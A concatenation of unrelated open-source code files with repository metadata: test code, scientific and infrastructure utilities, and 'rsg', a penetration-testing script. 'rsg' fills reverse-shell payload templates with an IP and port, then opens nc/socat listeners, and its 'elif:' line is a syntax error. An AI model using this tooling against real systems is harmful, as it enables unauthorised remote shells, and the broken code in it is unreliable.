"fuel_cost_per_mwh": [1] * 8,
"heat_rate_mmbtu_mwh": [1] * 8,
"fuel_cost_per_mmbtu": [1] * 8,
"fuel_type_code_pudl": ["test"] * 8,
"planned_generator_retirement_date": [2076] * 8,
"generator_retirement_date": [2076] * 8,
}
).astype(
{
"report_date": "datetime64[ns]",
"generator_retirement_date": "datetime64[ns]",
"planned_generator_retirement_date": "datetime64[ns]",
}
)
path_to_one_to_many = resources.files("pudl.package_data.test").joinpath(
"test_one_to_many.csv",
)
pudl_out = PudlTablMock()
parts_compiler = pudl.analysis.plant_parts_eia.MakePlantParts(pudl_out)
one_to_many_df = (
parts_compiler.add_one_to_many(
plant_parts_eia=plant_part_list_input,
part_name="plant_match_ferc1",
path_to_one_to_many=path_to_one_to_many,
)
.convert_dtypes()
.set_index("record_id_eia")
)
plant_gen_one_to_many_expected = (
pd.DataFrame(
{
"report_date": ["2020-01-01"] * 9,
"record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"gen_1",
"gen_2",
"gen_3",
"gen_4",
"tech_nat_gas",
"3_0_2020_plant_match_ferc1_total_1",
],
"plant_id_eia": [3] * 9,
"plant_name_eia": ["sparky"] * 9,
"plant_part": [
"plant",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_technology",
"plant_match_ferc1",
],
"generator_id": [None, None, None, 1, 2, 3, 4, None, None],
"unit_id_pudl": [1, 1, 2, 1, 2, 2, 2, 2, 2],
"technology_description": ["nat_gas"] * 9,
"operational_status": [
"operating",
"operating",
"operating",
"operating",
"operating",
"operating",
"operating",
"operating",
None,
],
"operational_status_pudl": ["operating"] * 9,
"utility_id_eia": [1] * 9,
"ownership_record_type": ["total"] * 9,
"prime_mover_code": ["ch"] * 9,
"ferc_acct_name": ["test"] * 9,
"energy_source_code_1": ["source"] * 9,
"generator_operating_year": [1979] * 9,
"installation_year": [1979] * 9,
"construction_year": [1979] * 9,
"capacity_mw": [300, 300, 300, 300, 300, 300, 300, 300, 600],
"capacity_eoy_mw": [300, 300, 300, 300, 300, 300, 300, 300, 600],
"total_mmbtu": [10, 10, 10, 10, 10, 10, 10, 10, 20],
"net_generation_mwh": [100, 100, 100, 100, 100, 100, 100, 100, 200],
"total_fuel_cost": [100, 100, 100, 100, 100, 100, 100, 100, 200],
"fuel_cost_per_mwh": [1] * 9,
"heat_rate_mmbtu_mwh": [1] * 9,
"fuel_cost_per_mmbtu": [1] * 9,
"fuel_type_code_pudl": ["test"] * 9,
"planned_generator_retirement_date": [2076] * 9,
"generator_retirement_date": [2076] * 9,
"gen_id": [None, None, None, None, "gen_2", "gen_3", None, None, None],
"ferc1_generator_agg_id": [None, None, None, None, 0, 0, None, None, 0],
"fraction_owned": [None, None, None, None, None, None, None, None, 1],
"plant_part_id_eia": [
None,
None,
None,
None,
None,
None,
None,
None,
"3_0_plant_match_ferc1_total_1",
],
"plant_name_ppe": [
None,
None,
None,
None,
None,
None,
None,
None,
"sparky 0",
],
"record_count": [None, None, None, None, None, None, None, None, 1],
}
)
.astype(
{
"report_date": "datetime64[ns]",
"generator_retirement_date": "datetime64[ns]",
"planned_generator_retirement_date": "datetime64[ns]",
}
)
.convert_dtypes()
.set_index("record_id_eia")
)
pd.testing.assert_frame_equal(one_to_many_df, plant_gen_one_to_many_expected)
|
a6372b04d1a9180f03e23881edbaa67fd0e3cfe2
|
9d0228f3f7ee9cee0794319d4affc161b0a7adc2
|
/qmpy/web/views/api/optimade_api.py
|
bfee3b3a17eed1106664861ee60f0a1382a6e652
|
[
"MIT"
] |
permissive
|
wolverton-research-group/qmpy
|
db8a450a5708aac63aa39e104745b5cb0a4fa930
|
dede5bdf4aa3ea1187a7bc273e86336c24aadb25
|
refs/heads/master
| 2023-01-24T17:18:48.335699
| 2022-08-23T01:12:29
| 2022-08-23T01:12:29
| 18,248,720
| 124
| 65
|
MIT
| 2023-01-11T02:04:51
| 2014-03-29T19:18:53
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 10,034
|
py
|
optimade_api.py
|
from rest_framework import generics
import django_filters.rest_framework
from qmpy.web.serializers.optimade import OptimadeStructureSerializer
from qmpy.materials.formation_energy import FormationEnergy
from qmpy.materials.entry import Composition
from qmpy.models import Formation
from qmpy.utils import query_to_Q, parse_formula_regex
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.response import Response
from rest_framework.renderers import JSONRenderer, BrowsableAPIRenderer
from rest_framework_xml.renderers import XMLRenderer
from rest_framework_yaml.renderers import YAMLRenderer
from qmpy.rester import qmpy_rester
from django.http import HttpResponse, JsonResponse
from collections import OrderedDict
from qmpy.utils import oqmd_optimade as oqop
import time
import datetime
BASE_URL = qmpy_rester.REST_OPTIMADE
class OptimadeStructureDetail(generics.RetrieveAPIView):
queryset = FormationEnergy.objects.filter(fit="standard")
serializer_class = OptimadeStructureSerializer
renderer_classes = [JSONRenderer, XMLRenderer, YAMLRenderer, BrowsableAPIRenderer]
def retrieve(self, request, *args, **kwargs):
structure_id = request.path.strip("/").split("/")[-1]
self.queryset = self.queryset.filter(id=structure_id)
instance = self.get_object()
serializer = self.get_serializer(instance)
_data = [serializer.data]
data = []
for _item in _data:
item = OrderedDict([("id", _item["id"]), ("type", _item["type"])])
del _item["id"]
del _item["type"]
item["attributes"] = _item
data.append(item)
_data = serializer.data
data = OrderedDict([("id", _data["id"]), ("type", _data["type"])])
del _data["id"]
del _data["type"]
data["attributes"] = _data
full_url = request.build_absolute_uri()
representation = full_url.replace(BASE_URL, "")
time_now = time.time()
time_stamp = datetime.datetime.fromtimestamp(time_now).strftime(
"%Y-%m-%d %H:%M:%S"
)
meta_list = [
(
"query",
{
"representation": representation,
},
),
("api_version", "1.0.0"),
("time_stamp", time_stamp),
("data_returned", 1),
("data_available", Formation.objects.filter(fit="standard").count()),
("more_data_available", False),
(
"provider",
OrderedDict(
[
("name", "OQMD"),
("description", "The Open Quantum Materials Database"),
("prefix", "oqmd"),
("homepage", "http://oqmd.org"),
]
),
),
("warnings", []),
("response_message", "OK"),
]
return Response(
OrderedDict(
[
(
"links",
OrderedDict(
[
("next", None),
("previous", None),
(
"base_url",
{
"href": BASE_URL,
"meta": {"_oqmd_version": "1.0"},
},
),
]
),
),
("resource", {}),
("data", data),
("meta", OrderedDict(meta_list)),
]
)
)
class OptimadePagination(LimitOffsetPagination):
default_limit = 50
offset_query_param = "page_offset"
limit_query_param = "page_limit"
def get_paginated_response(self, page_data):
_data = page_data["data"]
data = []
for _item in _data:
item = OrderedDict([("id", _item["id"]), ("type", _item["type"])])
del _item["id"]
del _item["type"]
item["attributes"] = _item
data.append(item)
request = page_data["request"]
full_url = request.build_absolute_uri()
representation = full_url.replace(BASE_URL, "")
time_now = time.time()
time_stamp = datetime.datetime.fromtimestamp(time_now).strftime(
"%Y-%m-%d %H:%M:%S"
)
_oqmd_final_query = (
page_data["meta"]["django_query"]
if "django_query" in page_data["meta"]
else None
)
_warnings = (
page_data["meta"]["warnings"] if "warnings" in page_data["meta"] else []
)
if (not _warnings) and (not _oqmd_final_query):
_warnings = [
{
"type": "warning",
"detail": "_oqmd_NoFilterWarning: No filters were provided in the query",
}
]
meta_list = [
(
"query",
{
"representation": representation,
"_oqmd_final_query": _oqmd_final_query,
},
),
("api_version", "1.0.0"),
("time_stamp", time_stamp),
(
"_oqmd_data_in_response",
min(
self.get_limit(request),
self.count - self.get_offset(request),
),
),
("data_returned", self.count),
("data_available", Formation.objects.filter(fit="standard").count()),
(
"more_data_available",
(self.get_next_link() != None) or (self.get_previous_link() != None),
),
(
"provider",
OrderedDict(
[
("name", "OQMD"),
("description", "The Open Quantum Materials Database"),
("prefix", "oqmd"),
("homepage", "http://oqmd.org"),
]
),
),
("warnings", _warnings),
("response_message", "OK"),
]
return Response(
OrderedDict(
[
(
"links",
OrderedDict(
[
("next", self.get_next_link()),
("previous", self.get_previous_link()),
(
"base_url",
{
"href": BASE_URL,
"meta": {"_oqmd_version": "1.0"},
},
),
]
),
),
("resource", {}),
("data", data),
("meta", OrderedDict(meta_list)),
]
)
)
class OptimadeStructureList(generics.ListAPIView):
serializer_class = OptimadeStructureSerializer
pagination_class = OptimadePagination
renderer_classes = [JSONRenderer, XMLRenderer, YAMLRenderer, BrowsableAPIRenderer]
def get_queryset(self):
fes = FormationEnergy.objects.filter(fit="standard")
fes, meta_info = self.filter(fes)
return (fes, meta_info)
def list(self, request, *args, **kwargs):
query_set, meta_info = self.get_queryset()
page = self.paginate_queryset(query_set)
serializer = self.get_serializer(page, many=True)
page_data = {
"data": serializer.data,
"request": self.request,
"meta": meta_info,
}
return self.get_paginated_response(page_data)
def filter(self, fes):
request = self.request
filters = request.GET.get("filter", False)
if not filters:
meta_data = {
"warnings": [
{
"type": "warning",
"detail": "_oqmd_NoFilterWarning: No filters were provided in the query. Returning all structures",
}
],
}
return fes, meta_data
# shortcut to get all stable phases
filters = filters.replace("stability=0", "stability<=0")
filters = filters.replace("&", " AND ")
filters = filters.replace("|", " OR ")
filters = filters.replace("~", " NOT ")
q, meta_info = query_to_Q(filters)
if not q:
return ([], meta_info)
fes = fes.filter(q)
return (fes, meta_info)
def OptimadeInfoData(request):
data = oqop.get_optimade_data("info")
return HttpResponse(data, content_type="application/json")
def OptimadeVersionsData(request):
data = oqop.get_optimade_data("versions")
return HttpResponse(data, content_type="text/plain")
def OptimadeVersionPage(request):
versions = oqop.get_optimade_data("versions").strip().split("\n")[1:]
versions = ["v{}".format(item) for item in versions]
request_version = request.path.strip("/").split("/")[-1]
data = {"query": request.path}
if request_version in versions:
return JsonResponse(data)
else:
data["error"] = "Version not supported"
return JsonResponse({"status": "false", "message": data}, status=553)
def OptimadeLinksData(request):
data = oqop.get_optimade_data("links")
return HttpResponse(data, content_type="application/json")
def OptimadeStructuresInfoData(request):
data = oqop.get_optimade_data("info.structures")
return HttpResponse(data, content_type="application/json")
|
c8d1d2221d5945821791c53b58cc17555fae4076
|
993252f0bab4d37b1ea0f0b9a95dbb96a200808f
|
/dccp/linearize.py
|
eb8fddd47ff7fa558daac20640a128b19dee65dc
|
[] |
no_license
|
cvxgrp/dccp
|
4dba3e8e5c517a7c314a20d6144e2268c4cd61a1
|
c94aba9881e9f39119c1a693a5a752f23cf0d403
|
refs/heads/master
| 2023-06-09T08:50:12.835704
| 2022-07-09T21:22:12
| 2022-07-09T21:22:12
| 55,815,696
| 115
| 29
| null | 2020-12-02T04:47:42
| 2016-04-08T23:28:30
|
Python
|
UTF-8
|
Python
| false
| false
| 3,367
|
py
|
linearize.py
|
__author__ = "Xinyue"
import numpy as np
import cvxpy as cvx
def linearize_para(expr):
"""
input:
expr: an expression
return:
linear_expr: linearized expression
zero_order: zero order parameter
linear_dictionary: {variable: [value parameter, [gradient parameter]]}
dom: domain
"""
zero_order = cvx.Parameter(expr.shape) # zero order
linear_expr = zero_order
linear_dictionary = {}
for var in expr.variables():
value_para = cvx.Parameter(var.shape)
if var.ndim > 1: # matrix to vector
gr = []
for d in range(var.shape[1]):
g = cvx.Parameter((var.shape[0], expr.shape[0]))
# g = g.T
linear_expr += g.T @ (var[:, d] - value_para[:, d]) # first order
gr.append(g)
linear_dictionary[var] = [value_para, gr]
else: # vector to vector
g = cvx.Parameter(var.shape[0], expr.shape[0])
linear_expr += g.T @ (var[:, d] - value_para[:, d]) # first order
gr.append(g)
linear_dictionary[var] = [value_para, gr]
dom = expr.domain
return linear_expr, zero_order, linear_dictionary, dom
def linearize(expr):
"""Returns the tangent approximation to the expression.
Gives an elementwise lower (upper) bound for convex (concave)
expressions. No guarantees for non-DCP expressions.
Args:
expr: An expression.
Returns:
An affine expression.
"""
if expr.is_affine():
return expr
else:
if expr.value is None:
raise ValueError(
"Cannot linearize non-affine expression with missing variable values."
)
tangent = np.real(expr.value) #+ np.imag(expr.value)
grad_map = expr.grad
for var in expr.variables():
if grad_map[var] is None:
return None
complex_flag = False
if var.is_complex() or np.any(np.iscomplex(grad_map[var])):
complex_flag = True
if var.ndim > 1:
temp = cvx.reshape(
cvx.vec(var - var.value), (var.shape[0] * var.shape[1], 1)
)
if complex_flag:
flattened = np.transpose(np.real(grad_map[var])) @ cvx.real(temp) + \
np.transpose(np.imag(grad_map[var])) @ cvx.imag(temp)
else:
flattened = np.transpose(np.real(grad_map[var])) @ temp
tangent = tangent + cvx.reshape(flattened, expr.shape)
elif var.size > 1:
if complex_flag:
tangent = tangent + np.transpose(np.real(grad_map[var])) @ (cvx.real(var) - np.real(var.value)) \
+ np.transpose(np.imag(grad_map[var])) @ (cvx.imag(var) - np.imag(var.value))
else:
tangent = tangent + np.transpose(np.real(grad_map[var])) @ (var - var.value)
else:
if complex_flag:
tangent = tangent + np.real(grad_map[var]) * (cvx.real(var) - np.real(var.value)) \
+ np.imag(grad_map[var]) * (cvx.imag(var) - np.imag(var.value))
else:
tangent = tangent + np.real(grad_map[var]) * (var - var.value)
return tangent
|
e27ca211352d0a40f27fc2b34c8d45eaef545999
|
150a7b11cb531f8bc2a045aefcf2ebe1d151efa3
|
/ocs_ci/utility/localstorage.py
|
2f0d3b5f99dc9c65cbea61ac6608db9d95150777
|
[
"MIT"
] |
permissive
|
red-hat-storage/ocs-ci
|
c7ac414e1b86552da0439223dfa9bca39977f31a
|
5e9e504957403148e413326f65c3769bf9d8eb39
|
refs/heads/master
| 2023-08-17T16:19:51.154403
| 2023-08-17T13:27:12
| 2023-08-17T13:27:12
| 179,558,938
| 146
| 210
|
MIT
| 2023-09-14T16:38:44
| 2019-04-04T19:00:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,040
|
py
|
localstorage.py
|
"""
This module contains local-storage related methods
"""
import json
import logging
import os
import shutil
from distutils.version import LooseVersion
import yaml
from ocs_ci.framework import config
from ocs_ci.ocs import constants, defaults
from ocs_ci.ocs.exceptions import CommandFailed
from ocs_ci.ocs.node import get_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import csv
from ocs_ci.ocs.resources.packagemanifest import PackageManifest
from ocs_ci.utility.deployment import get_ocp_ga_version
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import clone_repo, get_ocp_version, run_cmd
from ocs_ci.utility.version import get_semantic_version
logger = logging.getLogger(__name__)
def fetch_all_device_paths():
"""
Return all device paths inside worker nodes
Returns:
list : List containing all device paths
"""
path = os.path.join(constants.EXTERNAL_DIR, "device-by-id-ocp")
clone_repo(constants.OCP_QE_DEVICEPATH_REPO, path)
os.chdir(path)
logger.info("Running script to fetch device paths...")
run_cmd("ansible-playbook devices_by_id.yml")
with open("local-storage-block.yaml") as local_storage_block:
local_block = yaml.load(local_storage_block, Loader=yaml.FullLoader)
dev_paths = local_block["spec"]["storageClassDevices"][0]["devicePaths"]
logger.info(f"All devices are {dev_paths}")
os.chdir(constants.TOP_DIR)
shutil.rmtree(path)
return dev_paths
def get_new_device_paths(device_sets_required, osd_size_capacity_requested):
"""
Get new device paths to add capacity over Baremetal cluster
Args:
device_sets_required (int) : Count of device sets to be added
osd_size_capacity_requested (int) : Requested OSD size capacity
Returns:
list : List containing added device paths
"""
ocp_obj = OCP(
kind="localvolume", namespace=config.ENV_DATA["local_storage_namespace"]
)
workers = get_nodes(node_type="worker")
worker_names = [worker.name for worker in workers]
config.ENV_DATA["worker_replicas"] = len(worker_names)
output = ocp_obj.get(resource_name="local-block")
# Fetch device paths present in the current LVCR
cur_device_list = output["spec"]["storageClassDevices"][0]["devicePaths"]
# Clone repo and run playbook to fetch all device paths from each node
path = os.path.join(constants.EXTERNAL_DIR, "device-by-id-ocp")
clone_repo(constants.OCP_QE_DEVICEPATH_REPO, path)
os.chdir(path)
run_cmd("ansible-playbook devices_by_id.yml")
# Filter unused/unallocated device paths
with open("local-storage-block.yaml", "r") as cloned_file:
with open("local-block.yaml", "w") as our_file:
device_from_worker = [1] * config.ENV_DATA["worker_replicas"]
cur_line = cloned_file.readline()
while "devicePaths:" not in cur_line:
our_file.write(cur_line)
cur_line = cloned_file.readline()
our_file.write(cur_line)
cur_line = cloned_file.readline()
# Add required number of device path from each worker node
while cur_line:
if str(osd_size_capacity_requested) in cur_line:
for i in range(len(worker_names)):
if device_from_worker[i] and (str(worker_names[i]) in cur_line):
if not any(s in cur_line for s in cur_device_list):
our_file.write(cur_line)
device_from_worker[i] = device_from_worker[i] - 1
cur_line = cloned_file.readline()
local_block_yaml = open("local-block.yaml")
lvcr = yaml.load(local_block_yaml, Loader=yaml.FullLoader)
new_dev_paths = lvcr["spec"]["storageClassDevices"][0]["devicePaths"]
logger.info(f"Newly added devices are: {new_dev_paths}")
if new_dev_paths:
assert len(new_dev_paths) == (
len(worker_names) * device_sets_required
), f"Current devices available = {len(new_dev_paths)}"
os.chdir(constants.TOP_DIR)
shutil.rmtree(path)
# Return list of old device paths and newly added device paths
cur_device_list.extend(new_dev_paths)
return cur_device_list
def check_local_volume_local_volume_set():
"""
Function to check if Local-volume and Local volume set is present or not
Returns:
dict: dict for localvolume and localvolumeset
"""
lv_or_lvs_dict = {}
logger.info("Checking if Local Volume is Present")
if csv.get_csvs_start_with_prefix(
csv_prefix=defaults.LOCAL_STORAGE_OPERATOR_NAME,
namespace=config.ENV_DATA["local_storage_namespace"],
):
ocp_obj = OCP()
command = f"get localvolume local-block -n {config.ENV_DATA['local_storage_namespace']} "
try:
ocp_obj.exec_oc_cmd(command, out_yaml_format=False)
lv_or_lvs_dict["localvolume"] = True
except CommandFailed as ex:
logger.debug(f"Local volume does not exists! Exception: {ex}")
logger.info("No Local volume found")
lv_or_lvs_dict["localvolume"] = False
logger.info("Checking if Local Volume Set is Present")
if csv.get_csvs_start_with_prefix(
csv_prefix=defaults.LOCAL_STORAGE_OPERATOR_NAME,
namespace=config.ENV_DATA["local_storage_namespace"],
):
ocp_obj = OCP()
command = (
f"get {constants.LOCAL_VOLUME_SET} {constants.LOCAL_BLOCK_RESOURCE} "
f"-n {config.ENV_DATA['local_storage_namespace']} "
)
try:
ocp_obj.exec_oc_cmd(command, out_yaml_format=False)
lv_or_lvs_dict["localvolumeset"] = True
except CommandFailed as ex:
logger.debug(f"Local volume Set does not exists! Exception: {ex}")
lv_or_lvs_dict["localvolumeset"] = False
return lv_or_lvs_dict
@retry(AssertionError, 12, 10, 1)
def check_pvs_created(num_pvs_required):
"""
Verify that exact number of PVs were created and are in the Available state
Args:
num_pvs_required (int): number of PVs required
Raises:
AssertionError: if the number of PVs are not in the Available state
"""
logger.info("Verifying PVs are created")
out = run_cmd("oc get pv -o json")
pv_json = json.loads(out)
current_count = 0
for pv in pv_json["items"]:
pv_state = pv["status"]["phase"]
pv_name = pv["metadata"]["name"]
logger.info("%s is %s", pv_name, pv_state)
if pv_state == "Available":
current_count = current_count + 1
assert (
current_count >= num_pvs_required
), f"Current Available PV count is {current_count}"
def get_local_volume_cr():
"""
Get localVolumeCR object
Returns:
local volume (obj): Local Volume object handler
"""
ocp_obj = OCP(
kind=constants.LOCAL_VOLUME,
namespace=config.ENV_DATA["local_storage_namespace"],
)
return ocp_obj
@retry(CommandFailed, 5, 30, 1)
def get_lso_channel():
"""
Get the channel to use for installing the local storage operator
Returns:
str: local storage operator channel
"""
ocp_version = get_ocp_version()
# If OCP version is not GA, we will be using the Optional Operators CatalogSource
# This means there are two PackageManifests with the name local-storage-operator
# so we need to also use a selector to ensure we retrieve the correct one
ocp_ga_version = get_ocp_ga_version(ocp_version)
selector = constants.OPTIONAL_OPERATORS_SELECTOR if not ocp_ga_version else None
# Retrieve available channels for LSO
package_manifest = PackageManifest(
resource_name=constants.LOCAL_STORAGE_CSV_PREFIX, selector=selector
)
channels = package_manifest.get_channels()
versions = []
stable_channel_found = False
for channel in channels:
if ocp_version == channel["name"]:
return ocp_version
else:
if channel["name"] != "stable":
versions.append(LooseVersion(channel["name"]))
else:
logger.debug(f"channel with name {channel['name']} found")
stable_channel_found = True
stable_channel_full_version = channel["currentCSVDesc"]["version"]
stable_channel_version = get_semantic_version(
stable_channel_full_version, only_major_minor=True
)
# Ensure versions are sorted
versions.sort()
sorted_versions = [v.vstring for v in versions]
if len(sorted_versions) >= 1:
# Use latest channel
if stable_channel_found:
if stable_channel_version > get_semantic_version(sorted_versions[-1]):
return "stable"
else:
return sorted_versions[-1]
else:
return channels[-1]["name"]
|
2b34bce0f50e1f3818115d92e020ca1fdbfc550f
|
444a9480bce2035565332d4d4654244c0b5cd47b
|
/research/cv/simclr/src/optimizer.py
|
485176be72b2869ee33aca7d6c403028e73834cb
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
mindspore-ai/models
|
7ede9c6454e77e995e674628204e1c6e76bd7b27
|
eab643f51336dbf7d711f02d27e6516e5affee59
|
refs/heads/master
| 2023-07-20T01:49:34.614616
| 2023-07-17T11:43:18
| 2023-07-17T11:43:18
| 417,393,380
| 301
| 92
|
Apache-2.0
| 2023-05-17T11:22:28
| 2021-10-15T06:38:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,543
|
py
|
optimizer.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""optimizer generator"""
from mindspore import nn, Tensor
from .lr_generator import get_lr
def get_train_optimizer(net, steps_per_epoch, args):
"""
generate optimizer for updating the weights.
"""
if args.optimizer == "Adam":
if args.run_distribute:
lr = get_lr(lr_init=1e-4, lr_end=1e-6, lr_max=9e-4,
warmup_epochs=args.warmup_epochs, total_epochs=args.epoch_size,
steps_per_epoch=steps_per_epoch,
lr_decay_mode="linear")
else:
lr = get_lr(lr_init=1e-5, lr_end=1e-7, lr_max=9e-5,
warmup_epochs=args.warmup_epochs, total_epochs=args.epoch_size,
steps_per_epoch=steps_per_epoch,
lr_decay_mode="linear")
lr = Tensor(lr)
decayed_params = []
no_decayed_params = []
for param in net.trainable_params():
if 'beta' not in param.name and 'gamma' not in param.name and 'bias' not in param.name:
decayed_params.append(param)
else:
no_decayed_params.append(param)
group_params = [{'params': decayed_params, 'weight_decay': args.weight_decay},
{'params': no_decayed_params},
{'order_params': net.trainable_params()}]
optimizer = nn.Adam(params=group_params, learning_rate=lr)
else:
raise ValueError("Unsupported optimizer.")
return optimizer
def get_eval_optimizer(net, steps_per_epoch, args):
lr = get_lr(lr_init=1e-3, lr_end=1e-5, lr_max=1e-2,
warmup_epochs=5, total_epochs=args.epoch_size,
steps_per_epoch=steps_per_epoch,
lr_decay_mode="linear")
lr = Tensor(lr)
optimizer = nn.Adam(params=net.trainable_params(), learning_rate=lr)
return optimizer
|
7b389bc63538659b70a1f8195a6444947148070e
|
9ed3b16b3da72e4c47a04f2f2e3ef395e9fd9f20
|
/contrib/openjdk17/update.py
|
c61f2e44e7288b82de836abf2244e5957ec61e1c
|
[
"BSD-2-Clause"
] |
permissive
|
chimera-linux/cports
|
fdae59dc25856942be3041e10e3533dbf8f883c3
|
714680161cd719dd047452c95fbb9b447bc23a86
|
refs/heads/master
| 2023-09-03T19:30:40.720670
| 2023-09-03T15:07:40
| 2023-09-03T15:07:40
| 374,000,317
| 118
| 37
|
BSD-2-Clause
| 2023-09-14T20:31:08
| 2021-06-05T02:07:34
|
Python
|
UTF-8
|
Python
| false
| false
| 30
|
py
|
update.py
|
pattern = r">jdk-([\d.]+)-ga"
|
8fbec7887b739ccb3dbeec452eac76a132a01843
|
29b62d060fcb01eca2e319b70f4ca7b5c259d7c4
|
/alita/factory.py
|
f3ae2d11c646dd355b91c73b5efb15f5705a0d33
|
[] |
no_license
|
dwpy/alita
|
eb4d58372b0d9d2988e63656511c61d8d6f88990
|
1d8a1565bc771e5ff16b454147cb44eadd19d237
|
refs/heads/master
| 2021-06-17T20:42:23.402187
| 2019-06-12T08:53:19
| 2019-06-12T08:53:19
| 174,462,948
| 119
| 2
| null | 2021-06-11T17:49:16
| 2019-03-08T03:31:05
|
Python
|
UTF-8
|
Python
| false
| false
| 2,508
|
py
|
factory.py
|
import os
import sys
import importlib
from alita.base import BaseFactory
def prepare_import(path):
"""
Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
if os.path.splitext(path)[1] == '.py':
path = os.path.splitext(path)[0]
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
class CliFactory:
def load_app(self, app_file=None):
try:
if not app_file:
app_file = os.environ.get('ALITA_APP') or "app.py"
import_name = prepare_import(app_file)
app_module = importlib.import_module(import_name)
return getattr(app_module, 'app')
except SyntaxError as e:
message = (
'Unable to import your app.py file:\n\n'
'File "%s", line %s\n'
' %s\n'
'SyntaxError: %s'
) % (getattr(e, 'filename'), e.lineno, e.text, e.msg)
raise RuntimeError(message)
class AppFactory(BaseFactory):
def __init__(self, app=None):
self.app = app
def create_request_object(self, environ):
from alita.request import Request
return Request(self.app, environ)
def create_base_response_class(self):
from alita.response import HTTPResponse
return HTTPResponse
def create_base_exception_class(self):
from alita.exceptions import HTTPException
return HTTPException
def create_exception_handler_object(self):
from alita.handler import ExceptionHandler
return ExceptionHandler(self.app)
def create_router_object(self):
from alita.routing import Router
return Router(self.app)
def create_static_handler(self):
from alita.handler import StaticHandler
return StaticHandler(self.app)
def create_jinja_loader(self):
from alita.templating import DispatchingJinjaLoader
return DispatchingJinjaLoader(self.app)
|
6904ad10cbc4c211bba7adcc0ad4a73033261a3c
|
00c167b38fc1f6fc6d8a7bbf0b10b2a1a565dd34
|
/rsg
|
4433265b41fd89526af9753212df61249f132a29
|
[
"MIT"
] |
permissive
|
mthbernardes/rsg
|
66772689028d0d2ab36e65fe7aca23d51795fcb9
|
2361cf88b30f9221296dc252f041d936b22dcb9f
|
refs/heads/master
| 2023-05-11T11:22:11.459761
| 2022-04-19T19:06:25
| 2022-04-19T19:06:25
| 113,935,763
| 579
| 137
|
MIT
| 2023-04-27T10:10:55
| 2017-12-12T02:57:07
|
Python
|
UTF-8
|
Python
| false
| false
| 2,376
|
rsg
|
#!/usr/bin/env python3
from sys import argv, exit as exit_code
from os import system, path
from re import findall
from subprocess import check_output
def GREEN(text):
return "\033[32m{}\033[0m".format(str(text))
def usage():
print('''Usage: python3 {} <ip address> <port> [shell type]
Examples:
python3 {} 127.0.0.1 4444
python3 {} 192.168.0.1 443 bash'''.format(argv[0],argv[0],argv[0]))
exit_code(-1)
def verify_ip(ipaddr):
output = check_output(['ip', 'address']).decode()
candidate_ips = [ip for ip in findall(r"(?:\d{1,3}\.){3}\d{1,3}",output) if '255' not in ip]
return ipaddr in candidate_ips
def main():
if len(argv) < 3:
usage()
ipaddr, port = argv[1], argv[2]
if not verify_ip(ipaddr):
print("Invalid IP address! Exiting.")
exit_code(-1)
shells = path.join(path.dirname(path.realpath(__file__)), 'shells.txt')
if len(argv) == 4:
shell_type = argv[3].upper()
else:
shell_type = ''
for shell in open(shells):
desc, cmd = shell.split('|', 1)
cmd = cmd.replace("[IPADDR]", ipaddr)
cmd = cmd.replace("[PORT]", port)
if shell_type in desc:
print(GREEN(desc))
print(cmd)
c = input('Select your payload, press "l" to listen on port {} or enter to exit: '.format(port))
if c == 'l':
if int(port) < 1024:
if shell_type == 'SOCAT':
print(shell_type)
system('sudo socat file:`tty`,raw,echo=0 tcp-listen:{},fork'.format(port))
# stablizied NC Listener
elif:
system('stty raw -echo; (echo \'script -qc "/bin/bash" /dev/null\';echo pty;echo "stty$(stty -a | awk -F \';\' \'{print $2 $3}\' | head -n 1)";echo export PATH=\\$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp;echo export TERM=xterm-256color;echo alias ll=\'ls -lsaht\'; echo clear; echo id;cat) | nc -lvnp <port> && reset')
else:
system('sudo nc -n -v -l -s {} -p {}'.format(ipaddr, port))
else:
if shell_type == 'SOCAT':
print(shell_type)
system('socat file:`tty`,raw,echo=0 tcp-listen:{},fork'.format(port))
else:
system('nc -n -v -l -s {} -p {}'.format(ipaddr, port))
if __name__ == "__main__":
main()
|
|
d81aa736c544dc23b100d36a5ac2a14d005d99f7
|
b8441dc1987be9e64fa3081d456b2a3060ec44d1
|
/mars/tensor/fuse/numexpr.py
|
c4da91f1400efc23f04e55cd226a197a2842b7c8
|
[
"BSD-3-Clause",
"MIT",
"ISC",
"Apache-2.0",
"CC0-1.0",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mars-project/mars
|
f99fefbce999d58a9249bc72046787a9731c9c73
|
c36c53fa22e10ef9477d9c454401a2f281375f31
|
refs/heads/master
| 2023-07-23T00:23:55.133015
| 2023-07-03T11:44:54
| 2023-07-03T11:44:54
| 160,543,708
| 2,704
| 362
|
Apache-2.0
| 2023-09-11T07:57:35
| 2018-12-05T16:04:03
|
Python
|
UTF-8
|
Python
| false
| false
| 6,225
|
py
|
numexpr.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
